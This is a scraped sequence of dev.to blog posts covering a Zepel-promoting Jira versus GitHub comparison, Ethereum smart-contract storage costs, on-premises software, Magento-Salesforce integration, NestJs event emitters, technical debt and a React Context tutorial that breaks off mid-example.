<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Akin to Jira, GitHub is also based on tickets,</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">leading </span><span style="color:#000;background-color:transparent">to a similar problem. Whereas tools like</span><br><span style="color:#000;background-color:transparent">Zepel help you prioritize and build customer</span><br><span style="color:#000;background-color:transparent">focussed software. But even when it comes to</span><br><span style="color:#000;background-color:transparent">issue tracking, GitHub lacks crucial functionalities</span><br><span style="color:#000;background-color:transparent">such as story points and proper grouping</span><br><span style="color:#000;background-color:transparent">methods. </span><br><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">In terms of features, this app doesn’t offer</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">traditional </span><span style="color:#000;background-color:transparent">project management functionalities such</span><br><span style="color:#000;background-color:transparent">as multiple views, file sharing, and messaging. It</span><br><span style="color:#000;background-color:transparent">also lacks custom dashboards. </span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Customer</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">requests</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira has an external service desk to</span><br><a href="https://zepel.io/blog/customer-feedback-and-ways-to-collect/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">collect customer feedback</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent"> but does not</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">support bringing in tickets from other external</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">tools such as Canny, Intercom, etc., like</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Zepel’s Streams does.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub Issues can collect customer feedback and</span><br><span style="color:#000;background-color:transparent">also enables bringing them in from other platforms</span><br><span style="color:#000;background-color:transparent">but only via imports.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Flexibility &</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">customizability</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira’s workflow builder allows you to create</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">customized workflows making it flexible.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub may not have a powerful workflow builder</span><br><span style="color:#000;background-color:transparent">but it has Actions and project boards to help</span><br><span style="color:#000;background-color:transparent">automate and customize your workflows efficiently.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Integrations</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Whopping 2000+ third-party apps and add-ons</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">are available.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Integrations available with almost every software</span><br><span style="color:#000;background-color:transparent">application in the market today.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Pricing</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira's free plan limits the no. of users</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">to 10 and also limits functionalities. The paid</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">plans start at </span><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">$7/user</span><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub has a free version but only for public</span><br><span style="color:#000;background-color:transparent">repositories and with feature limits. So, for private</span><br><span style="color:#000;background-color:transparent">repos and access to more functionalities, you must</span><br><span style="color:#000;background-color:transparent">choose either the Teams plan that starts at</span><br><span style="font-weight:700;color:#000;background-color:transparent">$4/user/month</span><span style="color:#000;background-color:transparent"> or the enterprise plan at</span><br><span style="font-weight:700;color:#000;background-color:transparent">$21/user/month</span><span style="color:#000;background-color:transparent">. </span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Best for</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Small to large SaaS enterprises. </span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Small software development teams. </span></td>
</tr>
</tbody>
</table>
---
## 3 Reasons why issue tracking isn't the ideal solution to project management
### 1. Customer needs can’t be boiled down to a two-line ticket
Perhaps the most important requirement for building customer-focussed software products is context. And that’s why teams put in so many hours of effort to understand the customer’s needs. So, when you try to compress all the information you’ve gathered about your customer’s requirements into a two-line ticket, what's the end product going to look like? There’s certainly going to be an information gap between the product and the engineering teams.
### 2. Developers aren’t ticket movers
Having worked with developers, you’d know one thing for sure; they love building features and hate the managing part i.e dragging and dropping tickets across the progress-tracking board. So, expecting them to be ticket movers rather than creators, who love to build software, is going to suck up their drive to improve the product. And bid adieu to quality.
### 3. Issue tracking hurts development
If bug tracking is the core of your project management, the quality of the software product is bound to take a big hit. Because your team will only look at building features as clearing tickets leaving no room for innovation. Moreover, there will be a lot of misunderstandings during product-engineering handoffs due to lack of context and clarity regarding the end goal. Also, there’s a lack of clarity on how efficiently the feature must function when your sole focus is on solving tickets. And that's how [issue tracking hurts development](https://zepel.io/blog/how-issue-tracking-hurts-development/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
The bottom line is that when it comes to capturing bugs, both GitHub Issues and Atlassian Jira are top-notch. But they fail to meet the criteria of a good project management software as there’s only so much you can do with tickets as your unit of work; you can only mend and not build.
<a href="https://zepel.io/solutions/engineering/?utm_source=devto&utm_medium=mid-image&utm_campaign=jira-vs-github" class="import-image"><img src="https://zepel.io/agile/content/images/2021/04/img-1-2.png" alt="Zepel, dev-friendly project management tool for engineering teams" style="max-width:700px;width:100%;"></a>
---
## 3 best alternatives to Jira and GitHub that are a better fit for your org
### 1. Zepel
Zepel is the perfect alternative to both the tools. And it can be the right app for your org as it is more than just a bug tracker.

It is a clutter-free project management app that doesn't focus just on tickets. Instead, it helps you prioritize and build customer-focussed software.
Zepel has powerful agile capabilities that support the implementation of scrum, kanban, or even a combination of both effortlessly.
Zepel's USP is its developer-friendly aspects such as deep integrations with [GitLab](https://zepel.io/integrations/gitlab/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), [Bitbucket](https://zepel.io/integrations/bitbucket/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), and even [GitHub](https://zepel.io/integrations/github/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), markdown support, `/` commands, and [automated Git workflows](https://zepel.io/guide/integrations/setup-git-workflow-automation/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). On setting up these Git workflow automations, Zepel will perform status updates on your dev crew’s behalf. You can complete this workflow by connecting your Slack to it and receive real-time notifications of progress updates by your squad. This is why Zepel is the widely-preferred [engineering project management software](https://zepel.io/solutions/engineering/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
You can onboard squads of any size painlessly owing to its uncomplicated design and affordable pricing.
**Key Highlights:**
- Intuitive, uncomplex, powerful UI that makes onboarding easy
- Capabilities that agile teams often look for — Sprints, burndown charts, boards, scrum boards, etc. — that allow both scrum and kanban implementation
- Developer-friendly due to deep integration with Git, markdown support, and `/` commands
- Git workflow automation along with Slack to perform status updates and receive instant notifications
- Brings in customer feedback from multiple sources like Canny, Intercom, etc., and helps prioritize it
- Great pricing plan!
[Have a look at all the functionalities that Zepel offers here](https://zepel.io/features/?ref=header/?utm_source=zepelblog&utm_medium=text&utm_campaign=jira-vs-github).
**Pricing:**
[Zepel’s pricing plan](https://zepel.io/pricing/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is simple. The free plan doesn’t charge a penny for the first 5 members, forever. So, no matter how many members you add, the first 5 members will never be charged. The paid plans for each member starting from the 6th are at **$5/member/month** billed annually or **$7/member/month** billed monthly.
**Best For:**
Development teams of any size that desire to build software products the agile way.
### 2. Wrike
Wrike is a popular Jira competitor that was also created for serving agile teams. Akin to Jira and GitHub, Wrike also lacks an intuitive user interface and has a very steep learning curve. But unlike the two apps, Wrike isn't a bug tracking software. It is a traditional project management tool like Zepel.

**Key Highlights:**
- Workspaces that are customizable
- Dynamic reports that are easy to share, insightful, and visual
- Boards, Gantt, and Calendar view to track progress and plan deadlines
- Workload and resource administration
- Shareable task lists and custom dashboards
[Check out all the functionalities Wrike offers](https://www.wrike.com/features/).
**Pricing:**
Wrike's free plan limits you to add up to 5 members only. The [paid plans](https://www.wrike.com/price/) start at **$9.80/member/month**.
**Best For:**
Agile product development and non-technical orgs that are small in size.
### 3. ClickUp
ClickUp is a well-known PM app that aims to be an all-in-one suite and has a wide target audience belonging to different sectors. Similar to Jira, ClickUp offers plenty of functionalities and integrations.

**Key Highlights:**
- Offers functionalities suitable for any company pertaining to any industry
- Supports a long list of views, namely, board, list, gantt, workload, box, table, calendar, activity, several reporting features, and mind maps.
- Easily customizable to serve your software development agency’s needs
- A massive number of third-party apps to integrate with
- Good customer support
[Here’s everything that ClickUp offers](https://clickup.com/features).
**Pricing:**
ClickUp's [pricing plan](https://clickup.com/pricing) includes a free plan that allows you to add unlimited users but with functionality restrictions. The paid plan starts at **$5/user/month**.
**Best For:**
Small software companies and non-technical orgs of any size.
---
## 3 Reasons why Zepel fits the bill for your business
Let's take a look at not one but three reasons why Zepel is the PM app meant for your squad:
### 1. Collaborate with agile squads of any size to implement Scrum, Kanban or both
Zepel enables you to onboard and collaborate with product development squads of any size with ease. And its powerful agile capabilities are every software squad's dream.
### 2. Ensure both your customers and your squad's happiness
Zepel’s Streams functionality helps bring in customer requests from various platforms and build customer-focussed features that are sure to satisfy your customers. Moreover, it gives your dev squad all the context they need and provides deep integrations with Git to do all the grunt work for them.
### 3. Right features, right pricing
Zepel offers just the right amount of features that your squad will need in order to build the best software products. Zepel's straightforward pricing plan is the icing on the cake. The free forever plan enables you to add up to 5 members for free, forever and without any functionality restrictions. So, even if your squad expands and you must add more members, you won’t be charged for the first 5. The paid plan starts at **$5/member**.
---
Impressed but want to see how Zepel fares in comparison with competitor agile project management tools? [Go ahead and check it out here](https://zepel.io/blog/agile-tools/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
You can also get a [no strings attached demo](https://zepel.io/request-demo/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) to learn more about Zepel and see for yourself [why 4000+ development teams love Zepel](https://zepel.io/customer-reviews/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). Or sign up and [take Zepel for a spin for free](https://zepel.io/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). | ranjalir |
695,843 | Where and how application data is stored in Ethereum? | This article was published in 2017, updated in February 2021. Ethereum is used to build decentralize... | 12,677 | 2021-05-12T10:24:23 | https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/ | blockchain, database, decentralization, softwareengineering |
This article was [published in 2017](https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/), updated in February 2021.
Ethereum is used to build decentralized applications, a.k.a. DAPPs. These applications exist *through* small programs that live on the Blockchain, called *smart contracts*.
Before jumping into the platform and writing a smart contract, it’s really important to understand where your application data is stored. Code execution, servers and programming language are rarely critical to the design of an application. But data --its structure and its security-- will constrain our design the most.
Let's imagine we are porting apps to Ethereum:
- For a *Facebook-like*, where are the publications and comments data?
- For a *Dropbox-like*, where are my private files?
- For a *Slack-like* chat app, where do we store discussion channels? And what about private messages?
## The Account Machine
Let’s skip the explanation of blockchain for a minute (you can read my post on why Blockchain can be best understood as a [machine that generates Consensus here](https://laurentsenta.com/articles/the-point-of-the-blockchain/)). Let’s look at Ethereum from a higher level of abstraction -- the *software* that powers it, which is basically a big, slow, reliable computer.
Ethereum holds a set of accounts. Every account has an owner and a balance (a quantity of Ether).
If I prove my identity, I can transfer Ether from my account to another. The money will flow from one account to the other. It's an atomic operation called a “transaction”.
In other words, the *Ethereum Software* is a transaction processing system that works as follows:
1. The system is in a certain state, i.e. every account has a certain balance.
2. We carry out one or more transactions
3. We get a new state: an updated set of accounts and their balances.
It’s as simple as that!
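That loop is easy to model in a few lines of plain JavaScript. This is only a toy illustration of the accounting model, nothing more (real Ethereum state also tracks nonces, contract code and storage):

```js
// Toy model of Ethereum's account state: a map of balances plus an
// atomic transfer that either fully applies or leaves the state untouched.
function applyTransaction(state, { from, to, amount }) {
  if ((state[from] ?? 0) < amount) {
    throw new Error("insufficient balance"); // rejected: no partial updates
  }
  // Produce state N+1; state N is never mutated.
  return {
    ...state,
    [from]: state[from] - amount,
    [to]: (state[to] ?? 0) + amount,
  };
}

const s0 = { alice: 10, bob: 0 }; // state N
const s1 = applyTransaction(s0, { from: "alice", to: "bob", amount: 3 });
console.log(s1); // { alice: 7, bob: 3 } -- state N+1
```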
With that out of the way, we can turn our attention to how to execute code and programs within a transaction. And that's where *Smart Contracts* come into play.
## Robot Accounts
Every account has an owner and a balance. But some of these accounts are special: they own themselves. At creation time, we give them a piece of code and memory. That's a *Smart Contract*.
A smart contract is really a smart bank account. The term "contract" is unclear—I prefer to think of them as Robot Accounts.
A smart contract is basically a robot that executes some code when it receives transactions. This transaction happens within the blockchain. It is public, replicated and validated by the network. That means a smart contract won't fail because of a power outage in a Datacenter.
A smart contract has a balance, some code, and some storage. This storage is [persistent][persistence], and that’s where we’ll find DAPP data.
## Storage of Robot Accounts
When a smart contract is created or when a transaction awakens it, the contract’s code can read and write to its storage space.
Here’s a breakdown of its Storage Specifications:
- It's a big dictionary (key-value store) that maps keys to values.
- Keys are strings of 32 bytes. We can have 2<sup>32 x 8 bits</sup> = 2<sup>256</sup> different keys. Same for values.
- It's like Redis, RocksDB or LevelDB storage.
- For a DAPP, a Smart Contract's storage plays the same role that hard-drive storage plays in a regular program.
Here's an example of a Smart Contract structure. It uses the Solidity Programming Language:
```
// Solidity Code (solidity.readthedocs.io)
struct Voter {
uint weight;
bool voted;
uint8 vote;
address delegate;
}
```
2<sup>256</sup> keys x 32 bytes (values) is around 10<sup>63</sup> PETABYTES. You would need several billions of times the age of the universe to go through this amount of data with an SSD.
Basically, we can safely assume that there’s no storage limit for a DAPP.
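For the curious, the arithmetic behind that figure can be reproduced with BigInt, since regular JavaScript numbers overflow long before 2<sup>256</sup>:

```js
// 2^256 possible keys, each holding a 32-byte value.
const totalBytes = (2n ** 256n) * 32n;

// 1 petabyte = 10^15 bytes; BigInt integer division is fine at this scale.
const petabytes = totalBytes / (10n ** 15n);

// The result has 64 digits, i.e. it is on the order of 10^63 petabytes.
console.log(petabytes.toString().length); // 64
```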
But there **is** a cost:
## DAPPs Fuel
For every transaction, we add some Ether, the fuel needed to power it. The emitter of the transaction pays this tax to motivate the miners to process the transaction. Miners ensure the network is reliable and we reward them with some Ether.
So we send transactions and some fuel to this big machine. When the transaction targets a Smart Contract, the Ethereum machine starts the Account’s Robot. Each action of this robot will burn some more gas.
The actions taken by this robot are translated into instructions in the *Ethereum Virtual Machine* (EVM). There are instructions to read from storage, instructions to write, and so on. Each of these instructions has a cost in fuel, and that cost will constrain how much storage we can use.
## Storage Cost
The cost of each instruction in a Smart Contract will limit the amount of storage it uses. In theory, Ethereum enables infinite storage space. But, in return, you have to provide gas for every read/write operation.
This cost changes all the time, depending on the network, the market and the way Ethereum specs develop. To get a general idea of the pricing, I simulated a few Smart Contracts:
I tried three operations:
1. Writing a `uint8` (one byte) in storage
2. Incrementing a `uint8` in the storage (read then write)
3. A simple voting function, which checks whether the emitter of the transaction has the right to vote and then updates the vote result. You can vote only once; the second attempt is short-circuited.
Code and tools are in the Appendix below. Here are the numbers:

(note from 2021: numbers here are outdated, but the currency is so volatile these days, use this as a rough order of magnitude).
Based on this table, this article would cost around 50 Euros to store with a Smart Contract, excluding pictures.
Posting a tweet costs a few euros, and ordering on Amazon a few cents.
Of course, these are estimations with different orders of magnitude. The exact cost will depend on the exact instructions you use, as well as on the network load, the current price of gas, etc. New algorithms might also bring down the price of Ethereum (Proof Of Stake).
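As a rule of thumb, a transaction's fee is the gas it uses multiplied by the gas price you offer. A tiny helper makes the orders of magnitude concrete; the 20,000 gas figure is the classic cost of an `SSTORE` to a fresh storage slot, and the 50 gwei price is an assumed value for illustration, not market data:

```js
// fee in ETH = gas used x gas price in gwei / 10^9 (1 ETH = 10^9 gwei)
function txFeeInEth(gasUsed, gasPriceGwei) {
  return (gasUsed * gasPriceGwei) / 1e9;
}

// Writing one fresh 32-byte storage slot costs 20,000 gas.
console.log(txFeeInEth(20000, 50)); // 0.001 ETH at an assumed 50 gwei
```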
## Finally, where should I store my data?
Well, maybe not on the Ethereum Blockchain. The data stored there, with Smart Contracts, is safe and easy to access. But the cost and the structure of the store is especially suited for metadata-related uses.
Taking the examples from the introduction: User Posts, Files and Message Boxes will probably be on another platform like IPFS. In the Ethereum Blockchain, we would store critical data, like encryption keys, roots to storage trees & authorizations.
Find all my previous articles on [laurentsenta.com](https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/)
## Appendix
Piece of code used for the table:
```
pragma solidity ^0.4.0;
contract Test {
mapping(uint => uint) tests;
function Test() {
}
function one_set() {
tests[0] = 0;
}
function two_increment() {
tests[0] = tests[0] + 1;
}
}
/// Give a single vote to proposal $(proposal).
/// (`voters` and `proposals` are state variables of the
/// surrounding voting contract, omitted here for brevity.)
function vote(uint8 proposal) {
    Voter storage sender = voters[msg.sender];
    if (sender.voted || proposal >= proposals.length) return;
    sender.voted = true;
    sender.vote = proposal;
    proposals[proposal].voteCount += sender.weight;
}
```
Tools used to run the code and evaluate the costs:
- [Ethereum Gas Station](http://ethgasstation.info/) to follow gas cost
- [Remix Solidity IDE](https://remix.ethereum.org/) to write and run Smart Contracts
[persistence]: https://en.wikipedia.org/wiki/Persistence_(computer_science) | laurentsenta |
695,893 | On-premises software advantages | Despite all the trends about and putting your data online, many companies still prefer hosting everyt... | 0 | 2021-05-20T12:58:10 | https://apiumhub.com/tech-blog-barcelona/on-premises-software-advantages/ | devops | ---
title: On-premises software advantages
published: true
date: 2021-05-11 07:12:00 UTC
tags: DevOps
canonical_url: https://apiumhub.com/tech-blog-barcelona/on-premises-software-advantages/
---
Despite all the trends about moving to the cloud and putting your data online, many companies still prefer hosting everything on internal servers. Although this means a significant investment in IT equipment, infrastructure, licenses, and support personnel, on-premises software has some significant advantages over cloud-hosted software, which we will discuss later on in the article.
## What is on-premises software
With on-premises software, from implementation to running of the solution, everything is done internally; whereby maintenance, safety and updates also need to be taken care of in-house.
With on-premises software, the company remains responsible for maintaining the solution and related processes. The deployment is done in house using the company’s infrastructure.
On-premises software is installed and runs on computers on the premises of the person or organization using the software, rather than at a remote facility such as a server farm or cloud.
With this usage model, a customer often buys or rents server-based software as a licensee, which is installed on their own servers or rented servers.
It is more expensive than on-demand or cloud software because it requires in-house server hardware, capital investment in software licenses, in-house IT support staff and longer integration periods. However, on-premises software is considered more secure, as the entire instance of software remains on the organization’s premises.
Many companies opt for on-prem because it doesn’t require third-party access, gives owners physical control over the server hardware and software, and does not require them to pay month after month for access.
### On-premises software advantages
- On-premise applications are reliable, secure, and allow enterprises to maintain a level of control that the cloud often cannot.
- In an on-premises environment, enterprises retain all their data
- Companies that have extra sensitive information, such as government and banking industries must have a certain level of security and privacy that an on-premises environment provides.
- Access to data is always ensured – even without an internet connection.
- The licensed software can be integrated deeper into the customer’s infrastructure and interlinked with other programs.
- Annual maintenance costs and one-time license fees are lower compared to paying recurring expenses associated with cloud software.
- Multiple users can also access the system simultaneously without affecting the speed.
- Since you’ll handle all of the on-premises software yourself, you’ll likely be able to customize it much more than if you were subscribing to a cloud-based system.
- It’s typically easier to install extra data protection tools to data and programs based on an on-premises system rather than a cloud-based one.
- You decide on the configuration, the upgrades and system changes.
I hope you found this article with on-premises software advantages useful! And if you need any help with on-premises software solutions, [let us know](https://apiumhub.com/tech-hub-barcelona/)! We can help! Also, we have [B2B2C customer identity and access management solution](https://vyou-app.com/) that can be installed on-premises and that can help you speed up time to market and decrease costs. | apium_hub |
695,983 | The importance of Magneto and Salesforce Integration | The enterprise of online product selling is growing these days. Particularly, regarding the pandemic... | 0 | 2021-05-12T12:47:04 | https://dev.to/iamsiddhant21/the-importance-of-magneto-and-salesforce-integration-59b3 | php, programming | The business of selling products online is growing these days, particularly since the pandemic, when people had no choice but to turn to eCommerce platforms to shop for essential products.
In this digital era, there are many powerful platforms available for building an equally powerful eCommerce website. A Magento store is one of them, offering a great deal of flexibility and open-source features to boost sales. [Magento Salesforce integration](https://www.orangemantra.com/services/salesforce-integration/) goes a step further, helping enterprises better understand customers, offer personalized products, and provide a stronger level of customer service.
## What is Salesforce?
Salesforce is one of the leading CRM (customer relationship management) platforms, offering an interactive view of customers' preferences and trends. It helps organize and quantify user information based on personal details and buying patterns to gauge interest levels.
With Salesforce integrated into your Magento store, you can consolidate your marketing activities, automate email workflows and social media promotions, and plan advertising campaigns strategically.
Magento CRM integration calls for hiring a Salesforce developer with years of expertise in integrating technical components and automating workflows.
[Read more](https://www.orangemantra.com/blog/top-benefits-of-magento-salesforce-integration/) | iamsiddhant21 |
696,013 | Upcoming SaaS in robotic process automation in logistics | Robotics technology is progressing slowly but surely in careful and thoughtful stages. Robots are amo... | 0 | 2021-05-12T13:43:35 | https://dev.to/ardasgroup/upcoming-saas-in-robotic-process-automation-in-logistics-hjo | Robotics technology is progressing slowly but surely in careful and thoughtful stages. Robots are among us right now.
Personal robots are busy cleaning the inside of our homes and helping to maintain our gardens. Commercial robots are busy with the manufacturing side of the supply chain, mainly in the automotive industry. But where are all the robots in the logistics environment? Why aren't there more advanced robots in warehouses helping to tackle today's distribution challenges?
This article on Logistics Trends explores these issues in detail. You will find that designing an advanced robot is costly and a major technological challenge. You will find that the distribution environment is complex and difficult to automate. But every day, there are breakthroughs in robotics that help us overcome these challenges.
continue reading https://ardas-it.com/upcoming-saas-in-robotic-process-automation-in-logistics | ardasgroup | |
696,246 | Journey to the real world by cloning DEV.to backend server(part 1) | In this long series we will explore amazing library and framework by implementing dev.to backend ser... | 12,683 | 2021-05-12T16:26:16 | https://dev.to/harshmangalam/journey-to-the-real-world-by-cloning-dev-to-backend-server-1icm | In this long series we will explore amazing libraries and frameworks by implementing the dev.to backend server.
### Tools we will use
1. Nodejs
> Nodejs is a JavaScript runtime which allows JavaScript to run outside the browser. Nodejs was developed by Ryan Dahl and utilizes Google's V8 JavaScript engine.
You can learn more about nodejs [here](https://nodejs.org/)
2. Graphql
> GraphQL is a query language for APIs which gives frontend developers full power to query exactly the data they need without too much hassle.
GraphQL is an alternative to REST. In REST we create a bunch of endpoints using different HTTP verbs like GET, POST, PUT, DELETE, etc., but in GraphQL we have one and only one endpoint, which always receives a POST request, no matter whether the intention is to fetch data or update it.
GraphQL was developed and open-sourced by Facebook. You can learn more about GraphQL [here](https://graphql.org/)
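The "one and only one endpoint" idea is easy to see in miniature: every request is a POST whose body names the operation, and a resolver map dispatches it. The framework-free sketch below is our own illustration; Apollo Server does this job for real GraphQL documents, adding parsing, validation and much more:

```js
// Each field name maps to a resolver function, just like in a GraphQL schema.
const resolvers = {
  posts: () => [{ id: 1, title: "Hello DEV" }],
  user: ({ id }) => ({ id, name: "demo-user" }),
};

// One entry point handles both reads and writes: the request body decides.
function handleRequest(body) {
  const resolve = resolvers[body.operation];
  if (!resolve) throw new Error(`Unknown operation: ${body.operation}`);
  return { data: { [body.operation]: resolve(body.args ?? {}) } };
}

console.log(JSON.stringify(handleRequest({ operation: "posts" })));
// {"data":{"posts":[{"id":1,"title":"Hello DEV"}]}}
```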
3. Apollo Server
> Apollo server is a graphql implementation for production use and can be used easily with any graphql client like relay , urql , apollo client etc..
You can explore much about apollo server [here](https://www.apollographql.com/docs/apollo-server/)
4. Express
> Express is the most popular unopinionated Node.js web framework. We will use Express as middleware to handle file serving. You can explore Express.js [here](https://expressjs.com/).
5. Prisma 2
> Prisma is a next-gen JavaScript and TypeScript ORM. It generates types for your models and provides hints in your editor during development so you can work faster.
You can explore prisma 2 [here](https://www.prisma.io/)
For the sake of simplicity, we will use JavaScript to develop the complete backend.
In the next part of the series, we will install the dependencies required to set up our project.
696,536 | The Crazy decoupler - NestJs Emitter | Those of us who have used NestJs are familiar of the architectural flow. We break code into modules.... | 0 | 2021-05-12T21:22:12 | https://dev.to/vjnvisakh/the-crazy-decoupler-nestjs-emitter-34hg | nestjs, events, emitter, listener | Those of us who have used NestJs are familiar of the architectural flow. We break code into modules. Modules have controller which are basically the public endpoints. And then there are services which can be injected on demand.
It gets messy when we have to communicate across modules. Sure if you are using micro-services it's a different game altogether, but there is something in NestJs which gives crazy level of decoupling. And those are called Event Emitters.
By using this guy, you can emit an event in a controller/service and listen for it in another controller/service WITHOUT importing them into each other. How cool is that. Wonder why we don't use it more often. Hmm!!! Need to read up on the cons of this stuff too I guess.
But till then, here is how simple it is.
**THE EMITTER**
```
@Get("emit")
async emit()
{
    // eventEmitter is an EventEmitter2 instance injected via the constructor
    this.eventEmitter.emit
    (
        'hello',
        "My name is Antony Gonzalves!"
    );
}
```
**THE LISTENER**
```
@OnEvent('hello')
handleOrderCreatedEvent(message)
{
console.log("I am expecting some messages now!");
console.log(message);
}
```
Points to note -
1. The emitter and listener are two separate files - can be controllers or services - doesn't matter.
2. The emitter basically emits an event called "hello" with data "My name is Antony Gonzalves!".
3. The listener is waiting for an event "hello". As soon as it receives, it prints the message out.
Crazy simple.
Please comment on the cons of this approach if you guys know any.
Happy Programming !!! | vjnvisakh |
696,564 | The truth about Technical debt? | I am always posting provoking post on my Linkedin, and I have decided to replicate those... | 0 | 2021-05-12T23:39:49 | https://dev.to/apssouza22/have-you-ever-reflected-on-tech-debt-2o0n | linkedinposts, projectmanagement, techlead | ###### I am always posting provoking post on my Linkedin, and I have decided to replicate those here. [Let's socialize!](https://www.linkedin.com/in/alexsandro-souza-dev)
Technical debt is widely used and discussed within engineering teams. However, in people mind, it looks like it accumulates because of some nasty, dirty practices.
Technical debt piles up even when you work with the best intentions and follow the best practices.
Why?
Because tech debt is not ONLY a result of prioritizing speedy delivery or poor development skills, but a natural result of writing code for something before we have a proper understanding of the complete solution.
Knowing that, a natural response is to invest more in the design phase. However, in reality, you can not capture and learn everything before start implementing the solution. The future is uncertain and might bring radical changes.
A leaner cycle is the best option. Take a piece of the Design effort and move it forward in a refactoring phase that happens every time a few pieces have consolidated and are ready to be secured.
In this scenario, we accept debt creation, trusting our ability to repay it in the short term.
Like financial debt, tech debt can harm or help your organization. To use it wisely, engineers and team leaders must monitor how much technical debt they acquire and learn to manage it well.
### Free Advanced Java Course
I am the author of the [Advanced Java for adults course](https://www.udemy.com/course/advanced-java-for-adults/?referralCode=8014CCF0A5A931ADED5F). This course contains advanced and not conventional lessons. In this course, you will learn to think differently from those who have a limited view of software development. I will provoke you to reflect on decisions that you take in your day to day job, which might not be the best ones. This course is for middle to senior developers and we will not teach Java language features but how to lead complex Java projects.
This course's lectures are based on a Trading system, an opensource project hosted on my [Github](https://github.com/apssouza22/trading-system). | apssouza22 |
696,940 | How To Use Context Hooks In React | The React has released the Context API as if we need to pass data to multiple nested components. But... | 0 | 2021-05-13T08:58:32 | https://dev.to/sivavadlamuri/how-to-use-context-hooks-in-react-bgf | react, reactnative, javascript, redux | React released the Context API for cases where we need to pass data to multiple nested components. But the Context API was a bit bulky and difficult to use in class components. With the release of React hooks, the React team released the useContext hook, which is simpler and easier to use.
What Is The Context API?
As we already know, React uses state to store data and props to pass data between components. This is well and good for local state and for passing data from parent to child. Plain state and props become difficult when you start to have global state, or props that need to be passed to deeply nested components.
The actual problem starts when you pass props down through a bunch of different components just so they can reach one single component far down the hierarchy.
This is where the Context API comes into the picture. With the Context API you can specify certain data that will be available to all components, so there is no need to pass this data through each component down to the nested one. It is a semi-global state that is available anywhere inside the context.
There are three things to remember here:
i) createContext() which is used to create the context
ii) Provider which provides the data
iii) Consumer which consumes the data which is given by the Provider
Example :
```js
const ThemeContext = React.createContext()

function App() {
  const [theme, setTheme] = useState('dark')
  return (
    <ThemeContext.Provider value={{ theme, setTheme }}>
      <ChildComponent />
    </ThemeContext.Provider>
  )
}

function ChildComponent() {
  return <GrandChildComponent />
}

class GrandChildComponent extends React.Component {
  render() {
    return (
      <ThemeContext.Consumer>
        {({ theme, setTheme }) => {
          return (
            <>
              <div>The theme is {theme}</div>
              <button onClick={() => setTheme('light')}>
                Change To Light Theme
              </button>
            </>
          )
        }}
      </ThemeContext.Consumer>
    )
  }
}
```
In the above code example, we are creating a new context using React.createContext. The React.createContext gives us a variable that has two things.
The first part is a provider which provides data to all components nested inside of it. In our case the data is a single object with the theme and setTheme properties.
